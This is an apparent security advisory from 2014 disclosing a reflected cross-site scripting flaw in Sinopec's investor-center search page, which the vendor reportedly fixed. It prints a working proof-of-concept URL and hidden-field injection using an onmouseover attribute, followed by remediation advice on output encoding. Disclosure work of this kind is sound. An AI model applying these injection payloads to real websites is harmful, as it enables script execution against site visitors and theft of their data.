_____ .___ _________ / _ \ | |/ _____/ / /_\ \| |\_____ \ / | \ |/ \ \____|__ /___/_______ / \/ \/ corporation China's Petroleum & Chemical Corporation, (SINOPEC Limited) ============================================================ Published Report: 19/02/2014 Credits: Advanced Information Security Corporation, USA Severity: High/Critical (OWASP TOP 10) Type: Web Application / Reflected Cross-Site Scripting Attack. Author: Nicholas Lemonias. (Information Security Expert) Vendor Overview =========================== China Petroleum & Chemical Corporation, or Sinopec Limited, is a Chinese oil and gas company based in Beijing, China. It is listed in Hong Kong and also trades in Shanghai and New York. Sinopec is the world's fifth biggest company by revenue. Sinopec Limited's parent, Sinopec Group, is one of the major petroleum companies in China, headquartered in Chaoyang District, Beijing. Sinopec's business includes oil and gas exploration, refining, and marketing; production and sales of petrochemicals, chemical fibers, chemical fertilizers, and other chemical products; storage and pipeline transportation of crude oil and natural gas; import, export and import/export agency business of crude oil, natural gas, refined oil products, petrochemicals, and other chemicals. In 2011 it ranked as the 5th largest company in sales in Forbes Global 2000. In 2009, it was ranked 9th by Fortune Global 500 becoming the first Chinese corporation to make the top ten and in 2010 it was ranked 7th. In 2007, it ranked first in the Top 500 Enterprises of China ranking. Sinopec is the largest oil refiner in Asia by annual volume processed. Sinopec produces around 1/4 as much raw crude oil as PetroChina, but produces 60% more refined products per annum. Sinopec has an astonishing revenue of 2.786 trillion CN income. Responsible Disclosure Timeline ====================================== [+] 21st of December 2013 - Contacted Vendor regarding the security realisation. [+] 25th of December 2013 - The Vendor verified & fixed the problem. Description of the security realisation ========================================= Visitors and users alike entrust the provider's website by default. Therefore the investor center directory in the public-facing online environment is vulnerable to a reflect cross-site scripting atack. Visitors to the site could be affected by this vulnerabiltiy. A page in the scope of searching through stock-exchange price shares of the company, for investors, is vulnerable to an input validation vulnerability. The path fragment /investor_center/historyQuery.jsp. does not filter metacharacters from user-input and allows injection and execution of third-party heterogeneous code through the hidden POST request. The problem concludes to the reproduction and execution of third-party untrusted code,thus exploiting the trust levels and, Confidentiality Integrity and Availability as per the requirements of best security practise and standards, ISO (27001). Proof of Concept (1) / Affected Services ========================================== http://english.sinopec.com/investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22&dayend=23&daystart=23&doSearch=true&endDate=2012-03-06&gid=1&monthend=3&monthstart=3&range=1&startDate=2000-10-19&Submit2=search&yearend=1967&yearstart=1967 Affected directory/script: /investor_center/historyQuery.jsp Injected Code to path fragment: /investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22" 1. Escaping previous fragment function: 2. Injection: /investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22&dayend=23&daystart=23&doSearch=true&endDate=2012-03-06&gid=1&monthend=3&monthstart=3&range=1&startDate=2000-10-19&Submit2=search&yearend=1967&yearstart=1967 Description: On mouse over the affected link, and the injected code will be executed. In this Proof-of-concept a prompt will alter the user's normal execution flow and thus confidentiality, integrity and availability are impacted. Proof of Concept (2) ========================================== POST /investor_center/historyQuery.jsp HTTP/1.1 Content-Length: 209 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=abcrPc-q2uTfoa0OsvLxt Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/7.54 (Windows NT 5.1; U) [en] Limitations Source Code (sample A) ============================================== <INPUT type=hidden name=doSearch value="true"> <input type="hidden" name="d" value=" onmouseover=prompt(973979) bad="> // line 8701 execution of the vulnerable Recommendations provided for Quality of Service =============================================== A. The recommendations that have been made to Sinopec Ltd were in good faith and in support of the quality of service. The technical recommendations made are therefore, to consider encrypting the view-state of the application. Furthermore to implement a stronger Cross-Site Scripting protection. Apparently XSS filtering is not properly applied, and metacharacter filtering allows data input over the HTTP protocol, and the ability to inject third-party heterogeneous code, which is untrusted, either in Java-Script, Active-X and Visual Basic Script. Please note that malicious users could take advantage of such a bug, as we have seen in notable cases of malware and propagation instances. B. Our consultation to Sinopec Ltd was therefore, for an immediate risk assessment and thus immediate review of upper-level security policies in accordance to ISO 27001 and ISO 27002 which was followed kindly by the team. Full review of ISMS policy scope and the SDLC of the vulnerable application and other subsidiary pages. Appendices ============================ A. Suggested the filtering of metacharacters. B. Suggested the utilisation User-server encoding of < and > to &lt; and &gt; in application output. C. An XSS attack could embrace mass user and product attacks, phishing theft of private and confidential information such as credit cards, passwords, and stored accounts. D. Suggested Filtering < and > and using appropriate encoding. ( and ) filtered and encoded to &#40; and &#41;, Example: # and & converted to &#35 (#) and &#38 (&). References ============================ OWASP. 2013. Cross Site Scripting (XSS) attacks, [ONLINE] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS), 2011 OWASP. 2013. XSS Filter Evasion Cheat-Sheet, [ONLINE] https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet?, 2013. Microsoft. 2011. Protecting against XSS attacks. [ONLINE] Available at: http://msdn.microsoft.com/en-us/library/ff649310.aspx. ** This vulnerability report is posted for the wider benefit of the security community, as is and without any warranties, including that of the warranty of merchantability and capability fit for a particular purpose. The information is posted under the FOI as per best security practises. *Copyright Advanced Information Security Corp &#169;, 2014*